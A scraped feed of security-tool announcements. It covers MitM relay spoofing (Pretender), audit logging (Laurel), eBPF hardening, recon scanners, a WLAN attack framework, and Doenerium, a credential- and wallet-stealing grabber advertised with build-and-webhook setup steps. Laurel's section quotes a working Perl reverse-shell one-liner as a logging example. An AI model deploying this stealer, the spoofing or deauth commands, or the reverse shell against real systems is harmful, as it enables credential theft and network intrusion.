Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing

27 July 2022 at 12:30
By: Zion3R

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disabled DHCPv6, DNS and router advertisements), --no-lnr (disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.

Building and Vendoring

Pretender can be build as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


Laurel - Transform Linux Audit Logs For SIEM Usage

26 July 2022 at 12:30
By: Zion3R


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <[email protected]>.



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines

25 July 2022 at 12:30
By: Zion3R


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in experimental stage, it may break, options and security semantics may change, some BPF programs will be updated to use Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strength Linux security. By restricting access to a various range of Linux features, bpflock is able to reduce the attack surface and block some well known attack techniques.

Only programs like container managers, systemd and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features, containers and applications that run on their own namespace will be restricted. If bpflock bpf programs run under the restricted profile then all programs/containers including privileged ones will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intent to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offer multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It support three global profiles to broadly cover the security sepctrum, and restrict access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the followings:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    If your kernel was compiled with CONFIG_BPF_LSM=y check the /boot/config-* to confirm, but when running bpflock it fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under restricted profile, the container logs will display:

    Running under the restricted profile may break things, this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all:
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and bpf.d profiles configs are in current directory inside bpflock directory, then we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    Bpf programs are built using libbpf. The docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses lot of resources including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

24 July 2022 at 12:30
By: Zion3R

Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself to discord to grab token when changed

Β 

Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip filE

Β 

Screenshots









Β  Setting Up

Install Node.js

Install Visual studio with C++ compilers and all enabled (is a bit gigs but u wont have errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPN's, Gaming, Messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info seeΒ commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity

23 July 2022 at 12:30
By: Zion3R


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. (1)

To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information

22 July 2022 at 12:30
By: Zion3R


Generates lists of live hosts and URLs for targeting, automating the usage of Massdns, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given from Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
Flag Description Default Required
Β  Β  Β  Β  Β  Β  Β  Β  --target-list Β  Β  Β  Β  Β  Β  Β  Β  Input file containing list of domains, e.g google.com Yes
Β  --massdns-path Β  Path to the MassDNS executable, if non-default ./massdns/bin/massdns No
Β  --masscan-path Β  Path to the Masscan executable, if non-default ./masscan/bin/masscan No
Β  --nmap Β  Run an nmap version detection scan on the gathered live hosts Disabled No
Β  --db-path Β  If using the --nmap option, supply the path to the database you would like to append to (will be created if does not exist) output/liveTargetsFinder.sqlite3 No
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwith.
  • Default settings for Masscan only scans ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • Default nmap settings only scans ports 80 and 443, with timing -T4 and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

File Description Examples
output/victimDomains_targetUrls.txt List of reachable, live URLs https://github.com, http://github.com
output/victimDomains_domains_alive.txt List of live domain names github.com, google.com
output/victimDomains_ips_alive.txt List of live IP addresses 10.1.0.200, 52.3.1.166
Supplied or default DB Path SQLite database storing live hosts and information about their services running
output/victimDomains_massdns.txt The raw output from MassDNS, in ndjson format
output/victimDomains_masscan.txt The raw output from Masscan, in ndjson format
output/victimDomains_nmap.txt The raw output from nmap, in XML format


RESim - Reverse Engineering Software Using A Full System Simulator

21 July 2022 at 12:30
By: Zion3R


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory
RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics'[1] platform’s high fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzing Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920 And a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses

20 July 2022 at 12:30
By: Zion3R


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g [email protected]

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with prefered settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagments.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB we need a Chrome browser instance (other browsers are also supported) with chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.



Pinecone - A WLAN Red Team Framework

19 July 2022 at 12:30
By: Zion3R


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

[email protected]:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, that can be seen typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
